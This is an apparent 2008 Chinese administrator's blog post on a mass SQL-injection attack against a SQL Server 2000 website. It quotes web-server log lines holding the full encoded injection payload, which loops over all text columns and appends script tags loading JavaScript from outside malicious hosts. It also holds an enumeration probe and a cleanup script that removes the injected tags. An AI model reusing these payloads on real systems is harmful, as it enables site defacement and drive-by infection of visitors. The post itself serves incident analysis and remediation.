近期客户网站遭遇JS木马病毒攻击,一般攻击的是SQL SERVER 2000数据库。
其源码如下:
攻击:第一次的时候什么大侠123来着忘记了,这次呢又是这个!~~~
<script src=http://3bom%62%2Ecom/c.js></script>
呵呵 看来并非SQL POST 或者 GET 注入了 ,因为我已经将SQL一般注入防止了。
我们看看网站日志:
2008年12月28日 ex081228.log 数据日志:
异常信息:
activity_view.asp key=3%3B%44%65%43%4C%61%52%45%20%40%53%20%4E%76%41%72%43%48%61%52%28%34%30%30%30%29%3B%53%65%54%20%40%53%3D%43%61%53%74%28%30%78%34%34%30%30%36%35%30%30%36%33%30%30%36%43%30%30%36%31%30%30%37%32%30%30%36%35%30%30%32%30%30%30%34%30%30%30%35%34%30%30%32%30%30%30%35%36%30%30%36%31%30%30%37%32%30%30%36%33%30%30%36%38%30%30%36%31%30%30%37%32%30%30%32%38%30%30%33%32%30%30%33%35%30%30%33%35%30%30%32%39%30%30%32%43%30%30%34%30%30%30%34%33%30%30%32%30%30%30%35%36%30%30%36%31%30%30%37%32%30%30%36%33%30%30%36%38%30%30%36%31%30%30%37%32%30%30%32%38%30%30%33%32%30%30%33%35%30%30%33%35%30%30%32%39%30%30%32%30%30%30%34%34%30%30%36%35%30%30%36%33%30%30%36%43%30%30%36%31%30%30%37%32%30%30%36%35%30%30%32%30%30%30%35%34%30%30%36%31%30%30%36%32%30%30%36%43%30%30%36%35%30%30%35%46%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%36%30%30%36%46%30%30%37%32%30%30%32%30%30%30%35%33%30%30%36%35%30%30%36%43%30%30%36%35%30%30%36%33%30%30%37%34%30%30%32%30%30%30%34%31%30%30%32%45%30%30%34%45%30%30%36%31%30%30%36%44%30%30%36%35%30%30%32%43%30%30%34%32%30%30%32%45%30%30%34%45%30%30%36%31%30%30%36%44%30%30%36%35%30%30%32%30%30%30%34%36%30%30%37%32%30%30%36%46%30%30%36%44%30%30%32%30%30%30%35%33%30%30%37%39%30%30%37%33%30%30%36%46%30%30%36%32%30%30%36%41%30%30%36%35%30%30%36%33%30%30%37%34%30%30%37%33%30%30%32%30%30%30%34%31%30%30%32%43%30%30%35%33%30%30%37%39%30%30%37%33%30%30%36%33%30%30%36%46%30%30%36%43%30%30%37%35%30%30%36%44%30%30%36%45%30%30%37%33%30%30%32%30%30%30%34%32%30%30%32%30%30%30%35%37%30%30%36%38%30%30%36%35%30%30%37%32%30%30%36%35%30%30%32%30%30%30%34%31%30%30%32%45%30%30%34%39%30%30%36%34%30%30%33%44%30%30%34%32%30%30%32%45%30%30%34%39%30%30%36%34%30%30%32%30%30%30%34%31%30%30%36%45%30%30%36%34%30%30%32%30%30%30%34%31%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%32%37%30%30%37%35%30%30%32%37%30%30%32%30%30%30%34%31%30%30%36%45%30%30%36%34%30%30%32%30%30%30%32%38%30%30%34%32%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%33%39%30%30%33%39%30%30%32%30%30%30%34%46%30%30%37%32%30%30%32%30%30%30%34%32%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%33%33%30%30%33%35%30%30%32%30%30%30%34%46%30%30%37%32%30%30%32%30%30%30%34%32%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%33%32%30%30%33%33%30%30%33%31%30%30%32%30%30%30%34%46%30%30%37%32%30%30%32%30%30%30%34%32%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%33%31%30%30%33%36%30%30%33%37%30%30%32%39%30%30%32%30%30%30%34%46%30%30%37%30%30%30%36%35%30%30%36%45%30%30%32%30%30%30%35%34%30%30%36%31%30%30%36%32%30%30%36%43%30%30%36%35%30%30%35%46%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%36%30%30%36%35%30%30%37%34%30%30%36%33%30%30%36%38%30%30%32%30%30%30%34%45%30%30%36%35%30%30%37%38%30%30%37%34%30%30%32%30%30%30%34%36%30%30%37%32%30%30%36%46%30%30%36%44%30%30%32%30%30%30%32%30%30%30%35%34%30%30%36%31%30%30%36%32%30%30%36%43%30%30%36%35%30%30%35%46%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%39%30%30%36%45%30%30%37%34%30%30%36%46%30%30%32%30%30%30%34%30%30%30%35%34%30%30%32%43%30%30%34%30%30%30%34%33%30%30%32%30%30%30%35%37%30%30%36%38%30%30%36%39%30%30%36%43%30%30%36%35%30%30%32%38%30%30%34%30%30%30%34%30%30%30%34%36%30%30%36%35%30%30%37%34%30%30%36%33%30%30%36%38%30%30%35%46%30%30%35%33%30%30%37%34%30%30%36%31%30%30%37%34%30%30%37%35%30%30%37%33%30%30%33%44%30%30%33%30%30%30%32%39%30%30%32%30%30%30%34%32%30%30%36%35%30%30%36%37%30%30%36%39%30%30%36%45%30%30%32%30%30%30%34%35%30%30%37%38%30%30%36%35%30%30%36%33%30%30%32%38%30%30%32%37%30%30%37%35%30%30%37%30%30%30%36%34%30%30%36%31%30%30%37%34%30%30%36%35%30%30%32%30%30%30%35%42%30%30%32%37%30%30%32%42%30%30%34%30%30%30%35%34%30%30%32%42%30%30%32%37%30%30%35%44%30%30%32%30%30%30%35%33%30%30%36%35%30%30%37%34%3 -
异常信息:
/news_view.asp key=132|41|80040e07|将_varchar_值
activity_history.asp |41|80040e07|将_varchar_值_'2<script_src=http://cn.jxmmtv.com/cn.js></script><script_src=http://cn.daxia123.cn/cn.js></script>'_转换为数据类型为_int_的列时发生语法错误。 -
异常信息:
news_view.asp key=226;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E636E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);--|41|80040e07|将_varchar_值_'2<script_src=http://cn.jxmmtv.com/cn.js></script><script_src=http://cn.daxia123.cn/cn.js></script>'_转换为数据类型为_int_的列时发生语法错误。 -
异常信息:
nfo_view.asp key=30%20AnD%20(sElEcT%20ChAr(94)%2BcAsT(CoUnT(1)%20aS%20VaRcHaR(100))%2bChAr(94)%20fRoM%20[mAsTeR]..[sYsDaTaBaSeS])>0 -
以上信息自己分析吧 ,这里不多讲了
下面处理数据库的SQL程序:
declare &tbName varchar(100),
&colName varchar(100),
&sql varchar(8000),
&str varchar(200),
&dd varchar(50)
declare tb cursor local for
select so.name tbName ,sc.name colName from syscolumns as sc
inner join sysobjects as so on sc.id=so.id where so.type='U' and sc.xusertype in(175,239,167,231,99,35)
open tb
fetch next from tb into &tbName,&colName
while &&fetch_status=0
begin
set &str='<script src=http://3bom%62%2Ecom/c.js>'
set &dd =''''''
set &sql='update '+&tbName+ ' set '+&colName+'=REPLACE(convert(varchar(8000),'+&colName+'),'''+&str+''','+&dd+') where '
set &sql=&sql+'patindex(''%'+&str+'%'','+&colName+')>0'
--print &sql
exec(&sql)
fetch next from tb into &tbName,&colName
end
close tb
deallocate tb
分享到:
相关推荐
5. **加强监测与响应**:建立有效的监测系统,一旦发现XSS攻击迹象,立即采取行动隔离并修复受影响的部分。 通过综合运用这些策略,企业和组织可以有效减少XSS蠕虫与病毒带来的威胁,保护用户的信息安全。 #### ...
1. 防御策略:防御XSS攻击的关键在于对用户输入进行严格的验证和过滤,确保所有用户提交的数据都被正确转义。此外,使用HTTP-only cookies可以防止会话cookie被JavaScript访问,从而降低攻击风险。内容安全策略...
DOM型XSS则涉及客户端JavaScript的DOM(文档对象模型),攻击者通过修改DOM树中的数据,导致页面上的JavaScript执行恶意代码。 XSS攻击可以做的事情非常多,几乎涵盖JavaScript能实现的所有功能: 1. **会话劫持**...
- 用户数据泄露:攻击者可以通过XSS获取用户的登录凭据、个人数据等。 - 钓鱼攻击:伪造页面,诱导用户执行操作,如点击恶意链接或提交个人信息。 - 身份冒用:利用XSS获取用户会话信息,实现对用户身份的冒用。 ...
随着计算机技术的飞速发展,信息安全问题日益凸显,尤其是计算机...同时,为了防止网络攻击和病毒入侵,还需采取必要的技术措施,包括但不限于漏洞修复、入侵检测系统部署和安全策略制定等,以保护信息系统免受攻击。
跨站脚本攻击(Cross-Site Scripting,简称XSS)是网络安全领域中常见的攻击手段之一,它利用了Web应用程序的不足,使攻击者能够注入恶意脚本到网页上,进而影响用户的安全。这种攻击方式可能导致用户数据泄露、会话...
这种攻击利用了信任关系,即用户对合法网站的信任,使得攻击者能够通过受害者的浏览器执行任意代码,从而盗取敏感数据、篡改网页或传播病毒等。 ### 二、XSS攻击的类型 XSS攻击主要分为三种类型: 1. **存储型XSS...
在IT行业中,安全是至关重要的一个领域,尤其是对于电信设备来说,它们承载着大量的通信数据,因此必须具备抵御各种攻击的能力。"电信设备-跨站攻击解决方法、移动终端及存储介质.zip"这个压缩包文件显然关注的是...
脚本入侵,也称为跨站脚本攻击(Cross-Site Scripting,简称XSS),是指攻击者在Web页面中注入恶意脚本,当用户浏览这些页面时,恶意脚本会在用户的浏览器中执行,从而盗取用户敏感信息或破坏网站功能。这种攻击方式...
这包括Web应用程序的安全,如SQL注入、跨站脚本(XSS)攻击,以及软件的授权和访问控制。未验证的用户输入、不安全的默认设置、不恰当的数据加密都可能导致数据泄露或系统被操纵。 4. 应急组织机构和职责 应急组织...
平台需要防范常见的Web攻击,如SQL注入、跨站脚本(XSS)和跨站请求伪造(CSRF)。应用防火墙(WAF)和安全编码实践对于防止这些攻击至关重要。 3. **安全防御**:安全防御体系包括预防、检测和响应机制。预防措施...
安全威胁无处不在,从传统的病毒和木马到现代的勒索软件和零日攻击,都对网络安全构成严重挑战。因此,安全对抗策略必须不断演进。这包括强化网络安全防护、实施安全培训、采用先进的安全技术和制定完善的安全政策。...
6. **蠕虫攻击**:通过邮件传播的蠕虫病毒可以自我复制并执行各种恶意行为,如发送更多邮件、查看用户的好友列表等,这在Wooyun的报告中也有提及。 7. **PC端与移动端的安全**:不仅PC端的邮箱服务存在安全隐患,...
1. Web应用安全:Web安全主要关注SQL注入、跨站脚本(XSS)、跨站请求伪造(CSRF)等常见攻击手法,逆向工程师需要掌握Web渗透测试技巧,发现并修复这些漏洞。 2. OWASP(Open Web Application Security Project)...
在部署和运行此类源码时,仍需注意定期更新、修复漏洞,防止SQL注入、XSS跨站脚本攻击等常见Web安全问题。 5. **网站功能**:一个典型的返利网可能包括以下功能: - 用户注册/登录系统:允许用户创建账户、管理...
- 跨站脚本(XSS)攻击:在网页中注入可执行的脚本,以盗取用户数据或操纵用户浏览器。 为了防范这些安全威胁,我们需要实施多层次的安全策略,包括防火墙、入侵检测系统、数据加密、身份验证、访问控制、安全更新...
WebSecurityGuard是一款专注于Web安全检测与监控的工具,它旨在帮助企业及个人用户保护其网站免受各种网络威胁,如SQL注入、跨站脚本攻击(XSS)、钓鱼攻击、恶意软件感染等。这款工具通过实时监测、深度扫描和智能...
3. **跨站脚本攻击(XSS)**:XSS允许攻击者在用户浏览器中执行恶意脚本,可能导致数据泄露、会话劫持等。防止XSS攻击的方法包括正确地编码输出、使用HTTPOnly Cookie防止会话令牌被盗,以及利用Content Security ...
它是一种模拟攻击者行为,对系统、网络或应用程序进行的授权测试,目的是发现并修复潜在的安全漏洞。渗透测试包括了多种技术,如网络扫描、漏洞利用、社会工程学等,旨在评估组织的安全防御能力。了解和掌握这些技术...